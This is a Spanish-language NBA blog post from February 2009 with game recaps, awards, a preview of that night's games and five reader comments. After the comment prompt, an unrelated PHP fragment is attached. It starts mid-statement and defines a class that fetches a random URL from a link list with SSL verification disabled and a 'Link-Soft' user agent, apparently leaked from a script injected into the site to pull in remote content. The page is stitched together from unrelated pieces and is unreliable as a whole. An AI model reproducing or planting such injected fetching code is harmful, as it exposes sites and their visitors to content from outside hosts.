La Crónica (17/02/2009)

18 de February de 2009 por TheDeerHunter

Día 1 post All-Star y volvemos a la competición como Dios manda. Como es lógico unos vuelven a la faena más centrados y otros menos…

De entre los “centrados” destacamos a los Suns. Se enfrentaron a los Clippers que tampoco es que sean ahora mismo una de las potencias mundiales del baloncesto, pero la avalancha de juego que mostraron para celebrar la destitución de Porter da que pensar. Otro que volvió hiper-motivado fue el Superman “Kripto-Nate-zado” Howard que se enfrentó a su antiguo máximo rival para el RoY de su promoción, Okafor. El palizón que se llevó el bueno de Emeka fue para hacérselo mirar como teórico especialista defensivo que es y subraya la diferente evolución que ambos han experimentado en su juego.

Los inusualmente defensivos Lakers, con el primer triple doble de Gasol en L.A. y otra sobresaliente actuación de Odom, negaron desde el primer momento cualquier atisbo de sorpresa a Atlanta en el Staples. En esta tesitura Kobe pudo dedicarse a dormitar gran parte del partido y la plantilla al completo disfrutó de cierta cota de protagonismo, incluídos Shannon Brown y Adam Morrison. Sólo cabe decir: “Sun Yue, te echaremos de menos. El año que viene te votaremos para el Partido de las Estrellas.”

Los que no empezaron de tan buen rollo fueron los Spurs que se dieron un buen revolcón en el Madison de la mano de nuestra nueva “Kriptonitilla”. Ya se habían acostumbrado demasiado los de Popovic a jugar con fuego pero ganar con la gorra. Les está bien empleado e igual esto sirve para que animen un poco el mercado. Los Pistons palmaron contra los Bucks (vamooos!!!) y los Sixers contra los “unadecal-dosdearena” Pacers. No son ni los primeros ni serán los últimos.

Del resto de partidos mencionar la vuelta de Kirilenko en una cómoda victoria ante los Grizzlies, donde un buen Milicic vuelve a restarle minutos a Marc; la victoria de Houston contra los Nets, involucrados ambos en rumores de traspasos (ojo que T-Mac no jugó pero sí lo hizo Vince); el susto de los Hornets en Oklahoma o el devaluado enfrentamiento entre Wolves y Wizards… que no sabemos ni cómo quedó.

PREMIOS

MVP: 45 puntos, 19 rebotes y 8 tapones. No hace falta que les diga que hablamos de Dwight Howard. Superman Returns! Por cierto, Krypto-Nate también se salió: 32 puntos, 10 rebotes y 3 asistencias en la victoria de los Knicks sobre los Spurs.

El rookie: Brook Lopez se ha consolidado como uno de los mejores novatos de la nueva hornada y una de nuestras debilidades. Ayer volvió a demostrarlo con 21 puntos, 9 rebotes, 4 tapones y 3 asistencias ante Yao ni más ni menos.

La sorpresa: Los 14 puntos y 8 rebotes de Malik Allen representan bien la sorpresa de los Bucks, que se aferran a la 8ª posición gracias a victorias como la de anoche ante los Pistons. Ojo también a otro detalle: en los últimos cuatro partidos, Lamar Odom ha atrapado sucesivamente 17, 18, 19 y 20 rebotes.

La decepción: Stuckey continúa sumido en una profunda crisis de juego (anoche 3 puntos, 1 de 6 en tiros, 1 asistencia) pero lo más decepcionante de la noche fue la agresión de Zach Randolph a Louis Admuson a pocos segundos del final del primer cuarto del Clippers-Suns.

El mayor esfuerzo en vano: Kevin Durant hizo todo lo posible para que los Thunder superasen a los Hornets, incluyendo 21 puntos… ¡en el último cuarto!. En total fueron 47 puntos con 16 de 27 en tiros de campo los del sophomore de Oklahoma City.

RAZONES PARA TRASNOCHAR

Esta noche sigue la avalancha de partidos. Entre los once que se disputarán destacamos, como cada día, los principales focos de atención.
– Lakers @ Warriors. El mejor ataque de la liga visita a la peor defensa. De hecho, el partido enfrenta a los dos equipos más anotadores de la NBA: entre ambos promedian 216 puntos por noche.
– Dwight Howard. Con Chandler fuera de los Hornets, nada impedirá a Howard destrozar a los de Byron Scott. Ojito a los números que se puede marcar.

Comenta

5 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Me autocorrijo… T-Mac no jugó porque ya no lo hará más esta temporada. (lesión, cómo no… rodilla para más datos)
    Se frustra el trade(trilada) con Vicente y me temo no podrá ganar su ronda de playoffs ni superar la maldición al menos por este año… lo cual ya deja de ser sorpresa.

    Triste… pero cierto.

      Citar

  2. Viva_Dirk dice:
    #2

    Lo que ha pasado con T-Mac no creo que sorprenda a nadie que lo halla visto jugar este año, salvo algunos destellos lo normal era verle trotar suavemente por la cancha en lugar de correr. Algo de esto vendrá del sobreesfuerzo que hizo la campaña pasa, y megaesfuerzo en play-offs.

    Pero este proyecto lleva enfermo desde el comienzo de la temporada pasada y muerto desde el trade de Gasol. Los Rockets deberian haber traspasado a McGrady cuando su valor era altísimo, igual que los Mavs deberian haber traspasado a Howard después de las finales con los Heat….y ya de forma descarada después del descalabro con los Warriors.

      Citar

  3. Fran Reyes dice:
    #3

    El debut de Shannon Brown fue estelar: cinco minutos, dos rebotes, tres faltas y dos pérdidas de balón. Cosa de los nervios.

      Citar

  4. MagicJohnson32 dice:
    #4

    Pues dejó mejores sensaciones Brown que Morrison, que anduvo muy nervioso, perdido y sin confianza ninguna. Su primer tiro apenas tocó el aro y el segundo, completamente solo, fue casi tan malo. Mira que me haría ilusión verlo siendo importante, pero me temo que como mínimo hasta el año próximo, nada de nada.

    Pena que a Brown le anulasen este gorro tan brutal: http://www.youtube.com/watch?v=K0N5D728RkE

    Estoy con Viva. A veces los equipos se aferran a proyectos sin futuro. Creo que todos vimos que los Mavs no iban a ninguna parte. Y la historia de los Rockets es más evidente aún. A los Suns les está pasando.

      Citar

  5. Viva_Dirk dice:
    #5

    Los Suns con aspiraciones al anillo murieron cuando traspasaron a Marion por Shaq y mas adelante cuando queriendo cambiar de estilo no aprovechas para sacar tajada el dos veces MVP Steve Nash.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>